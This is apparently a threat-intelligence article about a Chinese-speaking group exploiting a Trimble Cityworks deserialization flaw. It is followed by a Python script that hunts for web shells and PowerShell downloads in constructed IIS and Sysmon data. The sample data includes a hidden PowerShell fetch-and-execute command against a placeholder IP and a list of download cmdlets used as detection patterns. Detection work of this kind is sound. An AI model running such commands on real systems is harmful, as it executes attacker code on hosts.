Chinese Cyber Threat Actors Leverage Trimble Cityworks Vulnerability to Breach U.S. Government Networks


A threat actor tracked as UAT-6382, assessed to be Chinese-speaking, has been linked to the exploitation of a recently patched remote-code-execution vulnerability in Trimble Cityworks to deliver Cobalt Strike and the VShell backdoor.

Research by Cisco Talos indicates that UAT-6382 exploited CVE-2025-0944, carried out reconnaissance, and quickly deployed a range of web shells and custom malware to maintain access to the compromised systems. After gaining initial access, the group showed a particular interest in systems related to utility management.

These attacks, aimed at the enterprise networks of local government entities in the United States, were first detected in January 2025.

CVE-2025-0944 (CVSS score 8.6) is a deserialization-of-untrusted-data flaw in the GIS-centric asset management software that allows remote code execution. Trimble patched the flaw, and the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added it to its Known Exploited Vulnerabilities (KEV) catalog in February 2025.

According to indicators of compromise (IoCs) shared by Trimble, the vulnerability was exploited to install a Rust-based loader capable of deploying Cobalt Strike alongside a Go-based remote access tool, VShell, in a bid to achieve long-term control over the affected systems.

Cisco Talos tracks the Rust-based loader as TetraLoader. It is built with MaLoader, a publicly available malware-building framework written in Simplified Chinese.

Successful exploitation of the Cityworks application lets the attackers run initial reconnaissance to collect server information, then drop web shells such as AntSword, Chinato/Chopper, and Behinder, tools commonly used by Chinese hacking groups.

UAT-6382 has been observed enumerating directories on infected servers to locate files of interest, then moving them into the directories that host its web shells so they can be retrieved over HTTP. The group also used PowerShell to download and run several backdoors on the compromised systems.
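The intrusion chain described in the two paragraphs above (web shells dropped under the web root, files staged in the shell's directory for retrieval, and PowerShell spawned from the web server to fetch backdoors) leaves traces in IIS request logs and process-creation telemetry. The following script is an added example written for this page, not code from Cisco Talos, Trimble, or the IoC sets they published; the log lines, process events, application path allowlist (`KNOWN_PATHS`), and hostnames are all constructed for illustration. It flags POSTs to server-side scripts outside the known application paths, requests carrying a web shell client's User-Agent, non-script files fetched from a directory where a shell was seen, and shells or PowerShell download commands launched by the IIS worker process `w3wp.exe`.

```python
"""Hunt for the post-exploitation pattern described above.

All log lines and events below are CONSTRUCTED for this example; they are not
real Talos/Trimble indicators. Paths, IPs and the allowlist are assumptions.
"""
import posixpath
import re

# Constructed allowlist of server-side script paths the application legitimately serves.
KNOWN_PATHS = {"/cityworks/login.aspx", "/cityworks/services/upload.ashx"}
SCRIPT_EXTS = {".aspx", ".ashx", ".asmx"}
# AntSword's default User-Agent starts with "antSword/"; other clients can be added here.
SHELL_CLIENT_UA = ("antsword/",)
SHELL_IMAGES = ("cmd.exe", "powershell.exe", "pwsh.exe")
DOWNLOAD_CMDLETS = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer|\bcurl\b|\bwget\b",
    re.IGNORECASE)

# Constructed IIS W3C log. IIS writes spaces inside the User-Agent as '+', so whitespace splitting is safe.
IIS_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) sc-status
2025-01-14 02:11:03 10.0.0.5 GET /cityworks/Login.aspx - 443 192.0.2.10 Mozilla/5.0 200
2025-01-14 02:11:09 10.0.0.5 POST /cityworks/Services/Upload.ashx - 443 192.0.2.10 Mozilla/5.0 200
2025-01-14 02:11:15 10.0.0.5 POST /cityworks/temp/x.aspx - 443 198.51.100.7 antSword/v2.1 200
2025-01-14 02:11:20 10.0.0.5 POST /cityworks/temp/x.aspx - 443 198.51.100.7 antSword/v2.1 200
2025-01-14 02:12:01 10.0.0.5 POST /cityworks/Services/Upload.ashx - 443 192.0.2.10 Mozilla/5.0 200
2025-01-14 02:15:40 10.0.0.5 GET /cityworks/temp/backup.zip - 443 198.51.100.7 Mozilla/5.0 200
"""

# Constructed process-creation events in the shape of Sysmon Event ID 1 fields.
PROCESS_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://198.51.100.7/a.ps1')"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell -c Get-ChildItem C:\Users"},
]


def parse_iis(log_text):
    """Parse W3C extended log text into dicts keyed by the names in the #Fields header."""
    fields, rows = None, []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rows.append(dict(zip(fields, line.split())))
    return rows


def suspicious_web_requests(log_text, known_paths=KNOWN_PATHS):
    """Return (client_ip, path, reasons) for requests that look like web shell activity."""
    rows = parse_iis(log_text)
    hits, shell_dirs = [], set()
    for row in rows:  # pass 1: find the shells themselves
        path = row["cs-uri-stem"].lower()
        ua = row.get("cs(User-Agent)", "").lower()
        reasons = []
        if row["cs-method"] == "POST" and posixpath.splitext(path)[1] in SCRIPT_EXTS \
                and path not in known_paths:
            reasons.append("POST to a server-side script outside the known application paths")
        if ua.startswith(SHELL_CLIENT_UA):
            reasons.append("User-Agent matches a web shell client")
        if reasons:
            hits.append((row["c-ip"], path, reasons))
            shell_dirs.add(posixpath.dirname(path))
    for row in rows:  # pass 2: files staged next to a shell and pulled over HTTP
        path = row["cs-uri-stem"].lower()
        if row["cs-method"] == "GET" and posixpath.dirname(path) in shell_dirs \
                and posixpath.splitext(path)[1] not in SCRIPT_EXTS:
            hits.append((row["c-ip"], path,
                         ["file fetched from a directory hosting a web shell (possible staged exfiltration)"]))
    return hits


def suspicious_process_events(events):
    """Return (image, reasons) for shells launched by IIS or PowerShell download commands."""
    hits = []
    for ev in events:
        image, parent = ev["Image"].lower(), ev["ParentImage"].lower()
        reasons = []
        if image.endswith(SHELL_IMAGES) and parent.endswith("w3wp.exe"):
            reasons.append("shell spawned by the IIS worker process (web shell execution)")
        if DOWNLOAD_CMDLETS.search(ev["CommandLine"]) and re.search(r"https?://", ev["CommandLine"], re.I):
            reasons.append("command line downloads content from a URL")
        if reasons:
            hits.append((ev["Image"], reasons))
    return hits


if __name__ == "__main__":
    for hit in suspicious_web_requests(IIS_LOG) + suspicious_process_events(PROCESS_EVENTS):
        print(hit)
```

The allowlist approach is what makes the web-request rule useful in practice: a new `.aspx` that the application never shipped is a stronger signal than any content-based signature, because attackers rename and re-encode web shells freely but still have to POST to them. Baseline `KNOWN_PATHS` from a clean install of the same Cityworks version before relying on it.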